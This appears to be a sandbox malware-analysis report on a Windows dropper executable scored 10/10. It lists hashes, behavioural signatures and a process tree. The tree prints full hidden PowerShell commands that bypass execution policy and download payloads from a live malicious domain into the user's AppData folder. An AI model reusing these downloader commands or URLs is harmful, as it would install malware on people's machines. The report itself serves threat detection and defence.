Overview

overview

10

Static

static

10

0811cf7c27...de.exe

windows7-x64

9

0dd0b31f05...24.exe

windows7-x64

7

1ad888606f...e0.exe

windows7-x64

3

1c77a07e45...95.exe

windows7-x64

10

23f1c183af...bc.exe

windows7-x64

10

38e891599d...90.exe

windows7-x64

10

3a13e092e9...db.exe

windows7-x64

4

3b9dabd99d...82.exe

windows7-x64

3

58fe9776f3...06.exe

windows7-x64

10

5ab93bd422...11.exe

windows7-x64

3

6b06c25fc6...43.exe

windows7-x64

10

6cc8001c9b...07.exe

windows7-x64

1

73ca5dd6d4...3f.exe

windows7-x64

10

7b931d48ea...f0.exe

windows7-x64

10

7d6892645b...0f.exe

windows7-x64

10

9036aeb570...7e.exe

windows7-x64

3

9b6289a8bf...2b.exe

windows7-x64

8

acf2b76704...a7.exe

windows7-x64

3

af2f191f8d...53.exe

windows7-x64

10

cc7045d9fe...ab.dll

windows7-x64

10

d1a6bd542d...a8.exe

windows7-x64

10

efe947e0a8...69.exe

windows7-x64

10

f13edd0b86...9f.exe

windows7-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    27-11-2024 09:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe

  • Size

    212KB

  • MD5

    43b55685945d2cecc170b850cf622038

  • SHA1

    3b301a8a8a38dddd3cfb554b264342f9948102b0

  • SHA256

    73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f

  • SHA512

    ba08284c9c07150f68fc92be46cdf058caa0b6f9b25135cc2716c286efdbcfd59d79f5bf211260d900ac3fd8fe78b582010ae8985b2f240829c9b94020ae7a65

  • SSDEEP

    3072:DNDzKKCY4RZzOo8u2IJskwUu25iiik4l9ep6RHpm0/d2IK9EzB2tPNxBWg3facbN:pDGKClZl8P6KVRH83TtVf33bncxfq

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://frameupds.info/rwrw66/2222z.php

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://frameupds.info/rwrw66/1111z.php

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe
    "C:\Users\Admin\AppData\Local\Temp\73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2212
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Roaming\ewqeq.cmd
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2832
      • C:\Windows\system32\PING.EXE
        ping localhost -n 6
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2584
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass $KRIIR = New-Object System.Net.WebClient; $KRIIR.Headers['User-Agent'] = 'Command'; $KRIIR.downloadfile('http://frameupds.info/rwrw66/2222z.php','C:\Users\Admin\AppData\Roaming\7za.exe');
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2544
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass $KRIIR = New-Object System.Net.WebClient; $KRIIR.Headers['User-Agent'] = 'Command'; $KRIIR.downloadfile('http://frameupds.info/rwrw66/1111z.php','C:\Users\Admin\AppData\Roaming\25520.7z');
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:276

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    5b920cc7a32f313f3ffcd58ea1cf1f92

    SHA1

    e0b3bcc85b6246236451f9762755afd2c3f8bcdd

    SHA256

    277aad4e73cf2ea17a51f58ce0698d181adc185ad1fb8a19b38fb375a62bafdb

    SHA512

    c3b2c236df5a7c54941798dad05bee82b5c483042a906493bb949dde833489a83afd6092a703eadc419a037bb6999247bc52923765f55b1060944454ef892ff3

    Download Submit

  • C:\Users\Admin\AppData\Roaming\ewqeq.cmd
    Filesize

    5KB

    MD5

    03868028bcd5c24c468e2c66571fb850

    SHA1

    c1dbed55b06bcc1b6a6211f7f8de592d92beb911

    SHA256

    c9bbb054e47836ee23efdb0c3d4ad193f7cbad635cfc9f2ba37da1d912a8b313

    SHA512

    d3527a2b639e694a2c4c9ab3279092f6e470a7e86b3bd5aff3fdfe63760eee2c4393f0b43067e6d922064fabef6c510008676cabb9031aaf3fbee4305ab6c999

    Download Submit

  • memory/276-19-0x0000000002340000-0x0000000002348000-memory.dmp

    Filesize

    32KB

    Download

  • memory/276-18-0x000000001B550000-0x000000001B832000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2212-4-0x0000000002780000-0x0000000002790000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2544-10-0x0000000002C00000-0x0000000002C80000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2544-11-0x000000001B730000-0x000000001BA12000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2544-12-0x00000000027E0000-0x00000000027E8000-memory.dmp

    Filesize

    32KB

    Download